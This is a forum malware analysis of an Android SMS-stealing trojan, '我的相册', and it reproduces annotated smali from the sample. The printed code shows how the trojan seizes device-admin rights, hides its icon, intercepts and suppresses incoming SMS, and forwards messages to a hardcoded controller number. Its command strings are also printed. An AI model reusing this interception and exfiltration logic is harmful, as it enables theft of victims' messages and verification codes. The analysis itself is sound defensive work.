短信监控木马“我的相册”分析
【木马名称】: 我的相册【包名】:sada.rlnihao.testrlnihao
【分析工具】: APK改之理
【反编译】: 在dex中插入无效代码在一从来不调用的类上,造成无法二次打包和无法转化成java代码
【木马特点】: 监听截获收件信息,并可控制手机
随着移动互联网的迅速兴起,手机移动支付呈现井喷式发展。然而移动支付在便利人们生活的同时,也面临着越来越多的风险。近日xxshenqi出现,算是又给android移动安全又掀起风波。我想接下来一段时间将会有大量的类似xxshenqi的变种,这也给我们带来挑战和学习机会,同时带来的好处就是给小白用户做了个提醒,让他们感觉到自己的手机是需要保护。前天晚上在某一qq群里,冒出一个名叫“我的相册”,第一反应这就是一个马儿,当然若是一个马儿能找到它的源头是最好的,如电话号码或邮箱信息等,使用apk改之理进行反编译,发现没法转java代码,那就看smali吧,在二次打包时发现
原来是因为在无用类中插入了无效字节码使逆向工具无能,由于大部分逆向工具都是线性读取字节码并解析的,当遇到无效字节是,就会引起反汇编工具字节码解析失败。我去又遇到这个问题,真不知道怎么去处理,先看smali分析吧
代码树形结构: 木马整个的运作流程:
详细分析:
首先我们查看他的AndroidManifest文件,查看它具有哪些权限,和它的入口在哪
理清了他的能力和入口接下来我们就依依来分析
入口一MainActivity分析
启动SmsServer,调用ShareUtil.getFlag()获取Flag是否为”true”并且调用SmsUtil.compareDate()判断当前的时间否是”2014.8.31之后”,就通过短信发送” Install Success!”给木马作者. 看来这是一变种木马啊,还很新的。
invoke-direct {v1}, Landroid/content/Intent;-><init>()V
#Intent intent2 = new Intent();
.line 22
.local v1, "intent2":Landroid/content/Intent;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
#Content v5 = this.getApplicationContext();
const-class v6, Lsada/nihao/testnihao/SmsService;
invoke-virtual {v1, v5, v6}, Landroid/content/Intent;->setClass(Landroid/content/Context;Ljava/lang/Class;)Landroid/content/Intent;
#intent2.setClass(getApplicationContext(), SmsService.class);
.line 23
invoke-virtual {p0, v1}, Lsada/nihao/testnihao/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
#MainActivity.startService(intent2);
.line 26
:try_start_0
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getApplicationContext()Landroid/content/Context;
move-result-object v5
invoke-static {v5}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v4
#ShareUtil su = ShareUtil.getInstance(getApplicationContext());
.line 27
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v5, ""
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getFlag()Ljava/lang/String;
move-result-object v6
#String strFlag = su.getFlag(); 判断Flag 是否为“”;
invoke-virtual {v5, v6}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v5
#若flag不是“” 跳到cond_1标签执行
if-eqz v5, :cond_1
.line 28
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
#调用SmsUtil.compareDate() 判断当前时间是不是在"2014-08-31 23:00:00"之前
move-result v5
检测LockRec组件是否具有系统权限,若不是则将LockRec组件注册成系统管理员权限,然后调用 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);隐藏图标
const-string v5, "device_policy"
invoke-virtual {p0, v5}, Lsada/nihao/testnihao/MainActivity;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
move-result-object v5
check-cast v5, Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager这是设备管理主类,通过他可以实现屏幕锁定,屏幕亮度调节,出厂设置等功能
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#获取安全管理服务this.policyManager = this.getSystemService("device_police");
.line 38
new-instance v5, Landroid/content/ComponentName;
const-class v6, Lsada/nihao/testnihao/LockRec;
invoke-direct {v5, p0, v6}, Landroid/content/ComponentName;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
#ComponentName com = new ComponentName(this.content, LockRec.class);
iput-object v5, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#this.componentName = com;
.line 39
iget-object v5, p0, Lsada/nihao/testnihao/MainActivity;->policyManager:Landroid/app/admin/DevicePolicyManager;
#DevicePolicyManager v5 = this.policyManager;
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
#ComponentName v6 = this.componentName;
invoke-virtual {v5, v6}, Landroid/app/admin/DevicePolicyManager;->isAdminActive(Landroid/content/ComponentName;)Z
#boolean bret = v5.isAdminActive(v6); // 判断LockRec组件是否有系统管理员的权限
move-result v5
if-nez v5, :cond_2
#跳向cond_2标签,表示LockRec组件已经具备系统管理员权限的
########################################################################################################################
#接下来将LockRec组件添加系统管理员权限
.line 41
new-instance v2, Landroid/content/Intent;
const-string v5, "android.app.action.ADD_DEVICE_ADMIN"
invoke-direct {v2, v5}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
#Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
.line 42
.local v2, "localIntent":Landroid/content/Intent;
const-string v5, "android.app.extra.DEVICE_ADMIN"
iget-object v6, p0, Lsada/nihao/testnihao/MainActivity;->componentName:Landroid/content/ComponentName;
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Landroid/os/Parcelable;)Landroid/content/Intent;
#指定给LockRec组件授予系统权限 localIntent.putExtra("android.app.extra.DEVICE_ADMIN", componentName);
.line 43
const-string v5, "android.app.extra.ADD_EXPLANATION"
const-string v6, "\u8bbe\u5907\u7ba1\u7406\u5668"
#String v6 = "设备管理器"
invoke-virtual {v2, v5, v6}, Landroid/content/Intent;->putExtra(Ljava/lang/String;Ljava/lang/String;)Landroid/content/Intent;
.line 44
invoke-virtual {p0, v2}, Lsada/nihao/testnihao/MainActivity;->startActivity(Landroid/content/Intent;)V
#this.startActivity(localIntent);
.line 51
.end local v2 # "localIntent":Landroid/content/Intent;
:cond_2
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getPackageManager()Landroid/content/pm/PackageManager;
move-result-object v3
#PackageManager p = this.getPackManager();
.line 52
.local v3, "p":Landroid/content/pm/PackageManager;
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->getComponentName()Landroid/content/ComponentName;
move-result-object v5
#ComponentName v5 = getComponentName();
const/4 v6, 0x2
const/4 v7, 0x1
invoke-virtual {v3, v5, v6, v7}, Landroid/content/pm/PackageManager;->setComponentEnabledSetting(Landroid/content/ComponentName;II)V
#隐藏图标 PackageManager().setCompoentEnabledSetting(getComponentName(),2,1);
.line 53
invoke-virtual {p0}, Lsada/nihao/testnihao/MainActivity;->finish()V
LockRec是神马东西喃? 我们可以进入AndroidManifest.xml文件查看
<!--屏幕锁屏或出厂设置,密码更换Recevice 可以通过查看android:resource指定的xml文件查看-->
<receiver android:description="@string/str" android:label="System 设备管理器" android:name="sada.nihao.testnihao.LockRec" android:permission="android.permission.BIND_DEVICE_ADMIN">
<meta-data android:name="android.app.device_admin" android:resource="@xml/lock_screen"/>
<intent-filter>
<action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
</intent-filter>
其实这就是为了调用DevicePolicyManager设备安全管理服务去干事,具体干什么是,我们可以通过上面代码中 android:resource标签指定的lock_screen文件查看:
<?xml version="1.0" encoding="utf-8"?>
<device-admin
xmlns:android="http://schemas.android.com/apk/res/android">
<uses-policies>
<--!force-lock设备自动锁屏-->
<force-lock />
</uses-policies>
</device-admin>
原来木马要干锁屏的事
入口二监听自启动广播
启动了一个名叫"WatchDogService"服务
new-instance v0, Landroid/content/Intent;
const-class v1, Lsada/nihao/testnihao/SmsService;
invoke-direct {v0, p1, v1}, Landroid/content/Intent;-><init>(Landroid/content/Context;Ljava/lang/Class;)V
.line 15
.local v0, "WatchDogService":Landroid/content/Intent;
const/high16 v1, 0x10000000
invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
.line 16
invoke-virtual {p1, v0}, Landroid/content/Context;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;
服务入口函数OnCreate()
1.注册SmsObServer类,它是继承ContentObServer类,目的是观察特定Uri引起的数据库变化,这个木马对短信收件箱做了监视.
.line 27
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getContentResolver()Landroid/content/ContentResolver;
move-result-object v1
.line 28
.local v1, "resolver":Landroid/content/ContentResolver;
new-instance v2, Lsada/nihao/testnihao/SmsObserver;
#resolver = this.getContentResolver(); 获取内容解析器
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsService;->getApplicationContext()Landroid/content/Context;
move-result-object v3
new-instance v4, Lsada/nihao/testnihao/SmsHandler;
invoke-direct {v4, p0}, Lsada/nihao/testnihao/SmsHandler;-><init>(Landroid/content/Context;)V
invoke-direct {v2, v3, v1, v4}, Lsada/nihao/testnihao/SmsObserver;-><init>(Landroid/content/Context;Landroid/content/ContentResolver;Lsada/nihao/testnihao/SmsHandler;)V
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
.line 29
const-string v2, "content://sms"
invoke-static {v2}, Landroid/net/Uri;->parse(Ljava/lang/String;)Landroid/net/Uri;
#Uri uri = Uri.parse("content://sms");
move-result-object v2
const/4 v3, 0x1
iget-object v4, p0, Lsada/nihao/testnihao/SmsService;->mObserver:Lsada/nihao/testnihao/SmsObserver;
invoke-virtual {v1, v2, v3, v4}, Landroid/content/ContentResolver;->registerContentObserver(Landroid/net/Uri;ZLandroid/database/ContentObserver;)V
#注册观察者类,监听短信数据库变化
#resolver.registerContentObserver(uri, ture, new SmsObserver(getApplictionContext(), resolver, new SmsHandler(this)));
2.动态注册smsReciver,并设置最大全权限,这样即使手机中存在安全软件,在重启手机后也有可能第一时间拿到短信
new-instance v2, Lsada/nihao/testnihao/SmsReceiver;
invoke-direct {v2}, Lsada/nihao/testnihao/SmsReceiver;-><init>()V
##########################################################################################################################
#动态注册短信SmsReciver广播包
#SmsReceiver smsRec = new SmsReceiver();
iput-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
.line 32
new-instance v0, Landroid/content/IntentFilter;
const-string v2, "android.provider.Telephony.SMS_RECEIVED"
#拦截短信事件
invoke-direct {v0, v2}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
.line 33
.local v0, "intentFilter":Landroid/content/IntentFilter;
const v2, 0x7fffffff
invoke-virtual {v0, v2}, Landroid/content/IntentFilter;->setPriority(I)V
#intentFilter.setPriority(0x7FFFFFFF);
.line 34
iget-object v2, p0, Lsada/nihao/testnihao/SmsService;->smsReceiver:Lsada/nihao/testnihao/SmsReceiver;
#SmsReceiver v2 = SmsService.smsReceiver;
new-instance v3, Landroid/content/IntentFilter;
const-string v4, "android.provider.Telephony.SMS_RECEIVED"
invoke-direct {v3, v4}, Landroid/content/IntentFilter;-><init>(Ljava/lang/String;)V
#IntentFilter intentFilter2 = new IntentFilter("android.provider.Telephony.SMS_RECEIVED");
invoke-virtual {p0, v2, v3}, Lsada/nihao/testnihao/SmsService;->registerReceiver(Landroid/content/BroadcastReceiver;Landroid/content/IntentFilter;)Landroid/content/Intent;
#SmsService.registerReceiver(SmsService.smsReceiver, intentFilter2);
#动态注册监听程序自启动的广播包,并调用setPriority()将该广播包设置为最大权限,
.line 35
return-void
.end method
此时以注册对收件箱的监控,当有消息发送到中码者手机,或者是木马操控者发送的,将会触发SmsObServer类中的OnChange调用
获取指定短信列值,并将封装成Message 然后触发SmsHandler
const-string v4, "read=?"
# 需要取得的咧
# String[] PROJECTION= {"_id","address","read","body","thread_id"};
const/4 v5, 0x1
new-array v5, v5, [Ljava/lang/String;
const/4 v6, 0x0
const-string v16, "0"
aput-object v16, v5, v6
const-string v6, "date desc"
invoke-virtual/range {v1 .. v6}, Landroid/content/ContentResolver;->query(Landroid/net/Uri;[Ljava/lang/String;Ljava/lang/String;[Ljava/lang/String;Ljava/lang/String;)Landroid/database/Cursor;
#获取指定列值的收件箱类容
#Cursor mCursor = resolver.query(Uri.parse("content://sms/inbox"), PROJECTION, "read=?", null, "date desc");
move-result-object v11
.line 32
.local v11, "mCursor":Landroid/database/Cursor;
if-nez v11, :cond_8
#if(mCursor != null)
.line 88
:cond_0
:goto_0
return-void
.line 40
:cond_1
new-instance v8, Lsada/nihao/testnihao/SmsInfo;
invoke-direct {v8}, Lsada/nihao/testnihao/SmsInfo;-><init>()V
#SmsInfo _smsInfo = new SmsInfo();
.line 42
.local v8, "_smsInfo":Lsada/nihao/testnihao/SmsInfo;
const-string v1, "_id"
#int _inIndex = mCursor.getColumnIndex("_id");
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v7
.line 43
.local v7, "_inIndex":I
const/4 v1, -0x1
if-eq v7, v1, :cond_2
.line 45
invoke-interface {v11, v7}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#SmsInfo.id = mCursor.getString(mCursor.getColumnIndex("_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->_id:Ljava/lang/String;
.line 48
:cond_2
const-string v1, "thread_id"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v15
.line 49
.local v15, "thread_idIndex":I
const/4 v1, -0x1
if-eq v15, v1, :cond_3
.line 51
invoke-interface {v11, v15}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
#Smsinfo.thread_id = mCursor.getString(mCursor.getColumnIndex("thread_id"));
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->thread_id:Ljava/lang/String;
.line 54
:cond_3
const-string v1, "address"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v9
.line 55
.local v9, "addressIndex":I
const/4 v1, -0x1
if-eq v9, v1, :cond_4
.line 57
invoke-interface {v11, v9}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#Smsinfo.smsAddress = mCursor.getString(mCursor.getColumnIndex("address"));
.line 60
:cond_4
const-string v1, "body"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v10
.line 61
.local v10, "bodyIndex":I
const/4 v1, -0x1
if-eq v10, v1, :cond_5
.line 63
invoke-interface {v11, v10}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
#Smsinfo.smsBody = mCursor.getString(mCursor.getColumnIndex("body"));
.line 66
:cond_5
const-string v1, "read"
invoke-interface {v11, v1}, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
move-result v13
.line 67
.local v13, "readIndex":I
const/4 v1, -0x1
if-eq v13, v1, :cond_6
.line 69
invoke-interface {v11, v13}, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
move-result-object v1
iput-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->read:Ljava/lang/String;
#Smsinfo.read = mCursor.getString(mCursor.getColumnIndex("read"));
.line 71
:cond_6
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#封装获取到的短信信息 通知Handler
invoke-virtual {v1}, Lsada/nihao/testnihao/SmsHandler;->obtainMessage()Landroid/os/Message;
move-result-object v12
.line 72
.local v12, "msg":Landroid/os/Message;
move-object/from16 v0, p0
#Message msg = new Message();
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->mContext:Landroid/content/Context;
invoke-static {v1}, Lsada/nihao/testnihao/ShareUtil;->getInstance(Landroid/content/Context;)Lsada/nihao/testnihao/ShareUtil;
move-result-object v14
.line 73
.local v14, "su":Lsada/nihao/testnihao/ShareUtil;
const-string v1, "1"
#ShareUtil su = ShareUtil.getInstance(this.mContext);
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v1
if-nez v1, :cond_7
iget-object v1, v8, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#获取是谁发过来的
invoke-virtual {v14}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v2
invoke-virtual {v1, v2}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
move-result v1
if-eqz v1, :cond_9
.line 74
:cond_7
const/4 v1, 0x2
iput v1, v8, Lsada/nihao/testnihao/SmsInfo;->action:I
.line 78
:goto_1
iput-object v8, v12, Landroid/os/Message;->obj:Ljava/lang/Object;
#msg.obj = item;
.line 79
move-object/from16 v0, p0
iget-object v1, v0, Lsada/nihao/testnihao/SmsObserver;->smsHandler:Lsada/nihao/testnihao/SmsHandler;
#mHandler.sendMessage(msg);; 触发hander处理偷取的收件箱信息
invoke-virtual {v1, v12}, Lsada/nihao/testnihao/SmsHandler;->sendMessage(Landroid/os/Message;)Z
在SmsHandler类中
1.判断发送者是否是木马作者的手机号,如是进入控制手机流程
2.普通号码发送的,将其短信装给自己
.line 41
.local v4, "su":Lsada/nihao/testnihao/ShareUtil;
:try_start_0
invoke-static {}, Lsada/nihao/testnihao/SmsUtil;->compareDate()Z
move-result v6
if-nez v6, :cond_0
.line 42
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
#String v6 = SmsInfo.smsAddress; 获取发信者手机号码
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
#木马作者 手机号码
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->contains(Ljava/lang/CharSequence;)Z
#判断本次接收到的短信是不是木马编写者
move-result v6
#v6 不为零表示木马作者发送的,这样就达到控制手机的目的
if-eqz v6, :cond_2
###########################################################################################################################################################################
#木马作者控制手机部分代码分析
.line 43
new-instance v2, Lsada/nihao/testnihao/SMSEntity;
invoke-direct {v2}, Lsada/nihao/testnihao/SMSEntity;-><init>()V
#SMSEntity sms = new SMSEntity();
.line 44
.local v2, "sms":Lsada/nihao/testnihao/SMSEntity;
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
#sms.smsTitle = SmsInfo.smsAddress;
.line 45
iget-object v6, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
iput-object v6, v2, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
#sms.smsContent = SmsInfo.smsBody;
.line 46
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-static {v6, v2}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#SmsUtil.parseStr(this,mcontext, sms);
:try_end_0
.catch Ljava/lang/Exception; {:try_start_0 .. :try_end_0} :catch_
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getSwitch()Ljava/lang/String;
move-result-object v7
invoke-virtual {v6, v7}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
move-result v6
if-eqz v6, :cond_0
.line 49
const-string v6, "\u6570\u636e\u5e93\u53d1\u9001"
#数据库发送
const-string v7, ""
#将用户接收到的短信转发给木马作者
invoke-static {v6, v7}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
.line 50
iget-object v6, p0, Lsada/nihao/testnihao/SmsHandler;->mcontext:Landroid/content/Context;
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v7
invoke-virtual {v4}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v8
new-instance v9, Ljava/lang/StringBuilder;
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsAddress:Ljava/lang/String;
invoke-static {v10}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v10
invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v10, v3, Lsada/nihao/testnihao/SmsInfo;->smsBody:Ljava/lang/String;
invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v9
invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v9
invoke-static {v6, v7, v8, v9}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Lj
木马作者的信息以及短息指令的抽取,是封装在Const类里面的
const/4 v1, 0x0
const-string v2, "13601574293"
aput-object v2, v0, v1
#String v0 = "13601574293";
const/4 v1, 0x1
const-string v2, ""
aput-object v2, v0, v1
#String v0 = "";
sput-object v0, Lsada/nihao/testnihao/Const;->nums:[Ljava/lang/String;
#Const.nums = v0;
.line 108
const-string v0, "#T"
sput-object v0, Lsada/nihao/testnihao/Const;->transpond:Ljava/lang/String;
#Const.transpond ="#T"
.line 109
const-string v0, "#S"
sput-object v0, Lsada/nihao/testnihao/Const;->switch1:Ljava/lang/String;
#Const.transpond = "#S";
.line 110
const-string v0, "#C"
sput-object v0, Lsada/nihao/testnihao/Const;->change:Ljava/lang/String;
.line 111
const-string v0, "SHA_PRE"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PRE:Ljava/lang/String;
#Const.SHA_PRE = "SHA_PRE";
.line 112
const-string v0, "SHARE_FLAG"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_FLAG:Ljava/lang/String;
#Const.SHA_FLAG = "SHARE_FLAG";
.line 113
const-string v0, "SHA_PHO"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHO:Ljava/lang/String;
.line 114
const-string v0, "SHARE_PHONE1"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_PHONE1:Ljava/lang/String;
.line 115
const-string v0, "SHARE_SWITCH"
sput-object v0, Lsada/nihao/testnihao/Const;->SHA_SWITCH:Ljava/lang/String;
return-void
入口三短信广播监听
.line 28
invoke-virtual {p0}, Lsada/nihao/testnihao/SmsReceiver;->abortBroadcast()V
#SmsReceiver.abortBroadcast()截断短信广播包往下流
.line 29
invoke-static {p1, v1}, Lsada/nihao/testnihao/SmsUtil;->parseStr(Landroid/content/Context;Lsada/nihao/testnihao/SMSEntity;)V
#进入SmsUtil类的paresStr函数,会对短信发送者进行识别。
.line 33
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone()Ljava/lang/String;
move-result-object v3
invoke-virtual {v2}, Lsada/nihao/testnihao/ShareUtil;->getPhone1()Ljava/lang/String;
move-result-object v4
new-instance v5, Ljava/lang/StringBuilder;
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsTitle:Ljava/lang/String;
invoke-static {v6}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
move-result-object v6
invoke-direct {v5, v6}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
iget-object v6, v1, Lsada/nihao/testnihao/SMSEntity;->smsContent:Ljava/lang/String;
invoke-virtual {v5, v6}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
move-result-object v5
invoke-virtual {v5}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
move-result-object v5
将短信转给木马作者
invoke-static {p1, v3, v4, v5}, Lsada/nihao/testnihao/SmsUtil;->sendSMS(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lja
从三个入口算是比较清楚的把这个木马搞定了,可是通过在无用类中插入无效字节码使逆向工具无能,这种手法小菜真的不知如何应对,还望和大家交流学习
测试发现360手机卫士和腾讯管家可以准确查杀,而百度手机卫士还不能查杀.................
看来安卓系统的木马会越来越多,越来越隐藏。。 大牛就是大牛膜拜中! 好像现在的手机病毒都是要root的 问一个问题,有时候会遇到像帖子中提到的问题,可以反编译,但是不能回编译,这种应该怎么解决呢
又见证了一个大牛的诞生! 辛苦了楼主{:301_999:} amscracker 发表于 2014-8-8 20:08
大牛就是大牛膜拜中!
相互学习{:1_912:} 358463121 发表于 2014-8-8 20:19
好像现在的手机病毒都是要root的
为何啊,这个不需要。 william2568 发表于 2014-8-8 20:19
问一个问题,有时候会遇到像帖子中提到的问题,可以反编译,但是不能回编译,这种应该怎么解决呢
分很多种情况,这个木马用到的技术是在无用类中插入无效字节码,占时还没有研究出 zxcfvasd 发表于 2014-8-8 23:01
分很多种情况,这个木马用到的技术是在无用类中插入无效字节码,占时还没有研究出
谢谢回答
有时候别人反编译之后,进行内购破解,然后回编译,整个过程十分流畅
我对同一个apk进行反编译,能成功,但是回编译却失败了
如果是插入了无效字节,那应该不止我一个人失败啊……
失败时的提示也正如文中所说的 exception in thread "main"……之类的
写了这么多,希望大神能指教一下
麻烦了,再次感谢!